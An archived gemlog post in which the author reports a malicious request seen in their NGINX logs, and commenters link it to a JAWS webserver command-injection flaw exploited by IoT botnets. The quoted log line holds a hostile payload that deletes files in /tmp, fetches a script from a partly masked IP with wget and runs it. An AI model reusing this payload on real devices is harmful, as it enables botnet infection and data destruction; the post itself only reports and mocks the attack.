💾 Archived View for gemini.panda-roux.dev › log › entry › 52 captured on 2023-05-24 at 17:45:05. Gemini links have been rewritten to link to archived content
⬅️ Previous capture (2023-01-29)
-=-=-=-=-=-=-
Posted on Friday April 8, 2022
Just a little while ago I happened to be glancing at this server's NGINX logs and noticed some obviously malicious requests resulting in 404s. Here is one of them.
[08/Apr/2022:16:42:47 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.XX.159/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"
I'm obscuring the IP address where the malicious script is hosted at just in case someone's browser wants to treat it as a hyperlink.
Based on this URL, I assume there must be some server software with a "/shell" route that will just run whatever script is in the query parameters. That's what the client who made this request thinks, anyway.
Does anyone know what ass-brained server might be doing something like that? That's such a hilariously bad idea.
- panda-roux -
next: "New gemlog URL format (and how it works)"
[2022-04-08 23:06:31] Lex (a8691):
looks like webserver is called JAWS. Found your URL mentioned here: https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/
[2022-04-08 23:38:47] panda-roux (ba929):
Thanks for finding that Lex. Pretty amazing just how bad this is. https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/